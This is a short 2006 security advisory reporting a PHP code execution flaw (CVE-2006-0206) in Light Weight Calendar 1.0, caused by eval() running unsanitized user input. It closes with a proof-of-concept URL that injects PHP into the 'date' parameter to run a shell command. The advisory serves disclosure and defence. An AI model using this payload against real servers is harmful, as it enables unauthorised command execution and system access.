PHP Code Execution in Light Weight Calendar
Summary
- Vulnerability
- PHP Code Execution in Light Weight Calendar
- Discovered
- 2006.01.12
- Last Update
- 0 n/a
- ID
- EV0029
- CVE
- CVE-2006-0206
- Risk Level
- high
- Type
- PHP Code Execution
- Status
- Unpatched
- Vendor
- n/a
- Vulnerable Software
- Light Weight Calendar (http://sourceforge.net/projects/lwcal/)
- Version
- 1.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
PHP Code Execution found in Light Weight Calendar (http://sourceforge.net/projects/lwcal/) script.
Vulnerable script: cal.php
Function eval() is called with user-defined parameter which is not properly sanitized. This can be used to execute arbitrary PHP code.
System access is possible.
PoC/Exploit
PHP Code Execution example.
http://host/lwc/index.php? stam=1928504&date=20050901);%20echo%20(%60ls%20-la%60 &View=month
Solution.
Solution for "PHP Code Execution in Light Weight Calendar" is not available. Check vendor's website for updates.